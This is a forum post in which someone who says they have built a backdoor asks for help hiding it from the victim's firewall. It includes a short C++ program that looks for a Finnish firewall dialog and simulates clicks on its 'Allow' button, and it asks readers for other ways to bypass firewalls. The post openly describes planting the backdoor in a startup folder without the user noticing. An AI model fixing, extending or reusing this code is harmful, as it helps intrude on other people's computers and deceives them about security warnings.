Bypassing firewall...
Hi!(Sorry if i have bad english and/or spelling errors) I have made a backdoor, but if i transfer it to some computer via floppy etc. and put it to startup folder. But when the program executes, the firewall blocks the connection and he/she must allow the connection and that would tell to he/she, that there is something fishy going on. So i programmed a program, that executes when the backdoor executes, and that program would allow the connection, but it wont work :(. The connection allowing program is following:
// the following program doesn't hide, yet.
#include <Windows.h>
using namespace std;
int main()
{
HWND window = FindWindow(NULL,"Sovellusten hallinta");
while(window == NULL)
{
window = FindWindow(NULL,"Sovellusten hallinta");
}
HWND button4 = FindWindowEx(window,NULL,"Salli",NULL);
SendMessage(button4,WM_LBUTTONDOWN,0,0);
SendMessage(button4,WM_LBUTTONUP,0,0);
return 0;
}
Here is the link to the picture that shows what the program must do: So what's wrong with the program? Got ANY ideas? If u got any other ideas about bypassing firewall, then post them. Thanks to anyone who replies to my question. (I hope that this question isn't noobish)